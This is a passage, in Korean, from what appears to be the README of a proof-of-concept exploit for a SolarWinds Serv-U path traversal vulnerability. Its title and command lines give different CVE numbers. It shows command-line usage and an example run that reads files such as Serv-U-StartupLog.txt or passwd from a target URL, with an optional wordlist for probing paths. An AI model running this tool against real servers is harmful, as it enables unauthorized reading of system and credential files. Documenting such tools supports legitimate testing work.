
CVE-2024-28955 익스플로잇 PoC
15.4.2 이하)과 비교합니다.이 도구를 사용하려면 Python이 설치되어 있어야 합니다. 적절한 인수와 함께 스크립트를 실행하세요:
python3 CVE-2024-28995.py -u <URL> [-d <Directory Path>] [-f <File Name>] [-w <Wordlist>]
-u, --url: 공격할 URL (필수).
-d, --dir: 파일 읽기를 위한 디렉토리 경로 (예: ProgramData/RhinoSoft/Serv-U/).
-f, --file: 읽을 파일 (예: Serv-U-StartupLog.txt 또는 passwd).
-w, --wordlist: 추가 경로를 테스트하기 위한 단어 목록.
예시
python3 CVE-2024-28995.py -u http://example.com -d ProgramData/RhinoSoft/Serv-U/ -f Serv-U-StartupLog.txt



참고 자료
https://www.labs.greynoise.io/grimoire/2024-06-solarwinds-serv-u/